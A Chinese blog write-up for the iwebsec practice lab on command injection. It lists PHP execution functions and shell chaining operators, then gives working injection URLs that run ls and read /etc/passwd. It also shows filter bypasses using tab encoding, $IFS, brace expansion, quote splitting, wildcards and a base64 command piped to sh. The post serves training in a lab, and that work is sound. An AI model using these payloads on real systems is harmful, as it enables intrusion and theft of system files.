iwebsec靶场(命令执行)

最新推荐文章于 2024-09-27 14:32:46 发布
最新推荐文章于 2024-09-27 14:32:46 发布
阅读量515 收藏
点赞数 1
分类专栏: iwebsec 文章标签: php 开发语言 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/129326418
版权

iwebsec靶场(命令执行)

一、什么是远程代码执行

  • 产生原因:由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用,控制服务器。

  • 漏洞危害:

    1、获取服务器权限
    2、获取敏感数据文件
    3、写入恶意文件getshell
    4、植入木马病毒勒索软件等

二、PHP-RCE涉及函数

1.代码注入
函数作用
eval()把字符串 code 作为PHP代码执行
assert()检查一个断言是否为 false
preg_replace()执行一个正则表达式的搜索和替换
create_function()创建一个匿名函数并且返回函数名创
call_user_func()/call_user_func_array()把第一个参数作为回调函数调用
usort()/uasort()使用用户自定义的比较函数对数组中的值进行排序并保持索引关联
2.命令注入
函数作用
system()执行外部程序,并且显示输出
exec()/shell_exec()通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回
pcntl_exec()在当前进程空间执行指定程序
passthru()执行外部程序并且显示原始输出
popen()打开进程文件指针
proc_open()执行一个命令,并且打开用来输入/输出的文件
指针

三、命令拼接符

1.Windows命令拼接符
符号作用示例
&&左边的命令执行成功,右边的才执行ping 127.0.0.1 && echo “hello”
&简单的拼接ping 1111& echo"hello"
|上一条命令的输出,作为下一条命令参数netstat -ano|findstr 3306
||左边的命令执行失败,右边的才执行ping baidu.com||ping baidu.net
2.Linux命令拼接符
符号作用示例
;没有任何逻辑关系的拼接符ping baidu.com;echo “hello”
&&左边的命令执行成功,右边的才执行cp 1.txt 2.txt && cat 2.txt
|上一条命令的输出,作为下一条命令的参数netstat -an|grep 3306
||左边的命令执行失败,右边的才执行cat 3.txt||cat 2.txt
&任务后台执行,与nohup命令功能差不多java -jar test.jar > log.txt &

四、靶场地址:http://iwebsec.com/

五、命令执行漏洞

1.执行系统命令
/exec/01.php?ip=127.0.0.1;ls

可以将;换成|

请添加图片描述

2.查看系统文件
/exec/01.php?ip=127.0.0.1;cat%20/etc/passwd

请添加图片描述

六、命令执行漏洞空格绕过

1.执行不需要空格的命令
/exec/02.php?ip=127.0.0.1;ifconfig

请添加图片描述

2.使用%09

  • %09是TAB键的url编码

    /exec/02.php?ip=127.0.0.1;cat%09/etc/passwd

    请添加图片描述

3.使用<

  • <表示的是输入重定向的意思,就是把<后面跟的文件取代键盘作为新的输入设备。“命令 < 文件” ,这是将文件作为命令输入。

    /exec/02.php?ip=127.0.0.1;cat</etc/passwd
4.使用{},

  • {}内是整体的命令,逗号就是空格的作用

    /exec/02.php?ip=127.0.0.1;{cat,/etc/passwd}
5.使用$IFS$9

  • 在bash下,可以用$IFS$9代替空格

    /exec/02.php?ip=127.0.0.1;cat$IFS$9/etc/passwd

七、命令执行漏洞关键命令绕过

1.常规绕过

  • 使用常规而且未被过滤的命令

    请添加图片描述

    /exec/03.php?ip=127.0.0.1;less%20/etc/passwd

    请添加图片描述

2.使用符号及拼接

  • 使用不同符号拼接成完整的命令

    /exec/03.php?ip=127.0.0.1;ca%27%27t%20/etc/passwd

八、命令执行漏洞通配符绕过

  • 使用通配符*替代某些字符

    /exec/04.php?ip=127.0.0.1;cat%20/et*/passw*

    请添加图片描述

九、命令执行漏洞base64编码绕过

  • 将命令进行base64编码

    /exec/05.php?ip=127.0.0.1;echo%20Y2F0IC9ldGMvcGFzc3dk|base64%20-d|sh

    请添加图片描述

    请添加图片描述

果粒程1122
关注
专栏目录
命令执行漏洞—简单利用1(墨者靶场
weixin_44431280的博客
03-03 1806
命令执行漏洞—简单利用1(墨者靶场命令执行漏洞原理和简介可参考文章:Web安全—远程命令/代码执行(RCE) 命令执行漏洞靶场通关: 步骤一:靶场登陆,输入IP地址查看回显。查看Web界面存在输入IP地址的地方,尝试输入环回地址127.0.0.1查看回显 输入IP地址127.0.0.1查看回显: 步骤二:信息收集判断操作系统,尝试使用系统连接符执行连带命令,例如127.0.0.1;ls。 1,使用Google插件Waapalyzer判断操作系统为Ubuntu(linux),可以使用连接符";"和“管
iwebsec靶场SQL注入-bool盲注
qq_56041380的博客
03-24 427
bool注入是盲注的一种。它于报错注入不同,布尔注入没有任何报错信息输出,页面返回只有正常和不正常两种状态,攻击者只能通过返回的这两种状态来对其进行判断输入的SQL注入语句是否正确,从而判断数据库中存储了那些信息。
命令执行靶场实战
qq_23347209的博客
05-31 652
文章目录环境准备一、信息搜集1、nmap扫描2、使用nikto扫描网站目录二、漏洞利用测试三、nc反弹shell 环境准备 靶场下载地址:https://www.vulnhub.com/entry/depth-1,213/ 使用Vmware虚拟机中NAT网络 靶机: 192.168.146.153 攻击机 parrot 192.168.146.129 提示:以下是本篇文章正文内容,下面案例可供参考 一、信息搜集 1、nmap扫描 -A全面扫描 -p-全端口扫描 nmap -A -p- 192.168
iwebsec靶场 解析漏洞通关笔记2-Nginx解析漏洞
最新发布
mooyuan的博客
09-27 1150
于是在访问http://192.168.71.151:8000/parse/index.jpg/x.php时,由于x.php不存在,PHP会递归向前解析,如果index.jpg存在就会把index.jpg当做PHP解析,造成了解析漏洞。http://x.x.x.x:8000/parse/index.jpg/x.php时,如果x.php不存在,PHP会递归向前解析,如果index.jpg存在就会把index.jpg当做PHP解析,造成了解析漏洞.在配置的过程中,查看nginx的php配置文件,如下所示。
iwebsec靶场-命令执行漏洞
dahege666的博客
03-31 969
命令执行漏洞
iwebsec(代码执行
果粒程
03-04 780
iwebsec(代码执行
iwebsec--命令执行漏洞
追求卓越,技术流~
12-04 1041
WINDOWS系统支持的管道符 “|”:直接执行后面的语句 例如:ping www.baidu.com|whoami “||”:如果前面执行的语句执行出错,则执行后面的语句 例如:png www.baidu.com||whoami “&”:如果前面的语句为假则直接执行后面的语句,前面的语句可真可假 例如:png www.baidu.com&whoami或者ping www.baidu.com&whoami “&&”:如果前面的语句为真先执行第一个命令执行第二个命令;为假则直接出错,也不执行后面的语句 例如
iwebsec靶场搭建
07-28
iwebsec靶场是一个漏洞集成容器,其中集成了大量的web漏洞环境,包括SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的漏洞环境。\[1\] 要搭建iwebsec靶场,可以使用docker来运行容器。...
iwebsec靶场SQL注入-sleep注入
qq_56041380的博客
03-26 356
sleep注入是另一种盲注方式,与bool注入不同,sleep注入没有任何报错信息输出,页面返回不管对错都只是一种状态,攻击者无法通过页面返回状态来判断输入的SQL注入测试语句是否正确,只能通过构造sleep注入的SQL测试语句,根据页面返回的返回时间判断数据库中存储了哪些信息
橙子科技命令执行靶场
m0_71282722的博客
07-14 626
这个靶场有个坑,这个坑就是在根目录下有一个flag,所以体现了现ls的重要性。要查看文件先确定路径,但是主要是为了熟练命令执行手法。在这个靶场里可以一条路走到黑,但是多一种方法往往又是就多一种出路。
vulrange命令执行靶场绕过
lionwerson的博客
03-31 274
1.开启靶场,提示过滤了cat命令 1.过滤了cat命令可以用其他的命令代替 (1)more (2)head (3)sort 等其他的命令替代 |ls #显示flag文件 |ls flag #显示flag文件 显示出flag852456.txt | more flag/flag852456.txt 读取flag 读取到的flag,其实也可以直接访问这个文件。 2.过滤空格 ${IFS} ${IFS}$1 $IFS+$1 <> %09(php环境下) 通过上面三种
iwebsec靶场 代码执行关卡通关笔记
mooyuan的博客
11-03 2228
iwebsec靶场代码执行漏洞10个关卡通关笔记。
iwebsec靶场(SSRF)
果粒程
03-06 568
iwebsec靶场(SSRF)
DVWA靶场命令执行(小白笔记)
热门推荐
晚风挽着浮云的博客
10-14 1万+
DVWA靶场命令执行 我们在测试一些web工具时,需要某个web应用作为我们的靶机,这时候就首选应用DVWA(Damn Vulnerable Web Application); DVWA是一款基于php&mysql编写的用于常规web漏洞和检测的web脆弱性测试web应用。其中包含了SQL注入,盲注,文件包含,XSS,CSRF等一些常见的WEB漏洞; 下面是一些命令执行 写的不好,多多包涵 在这里我们进行命令输入 这里我们选择DVWA的难度等级 1:难度LOW...
iwebsec靶场(sql注入)
果粒程
02-24 1185
iwebsec靶场(sql注入)
iwebsec靶场(XXE漏洞)
果粒程
03-07 919
iwebsec靶场(XXE漏洞)
Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场
网络安全领域___专研者.
04-24 3307
iwebsec 本质上是一个漏洞集成容器,里面集成了大量的漏洞环境.(如:集合了SQL注入、文件包含、命令执行、XXE、反序列化、SSRF、XSS、文件上传等常见的web漏洞环境) Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身.
iwebsec靶场(文件包含)
果粒程
03-02 1313
iwebsec靶场(文件包含)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值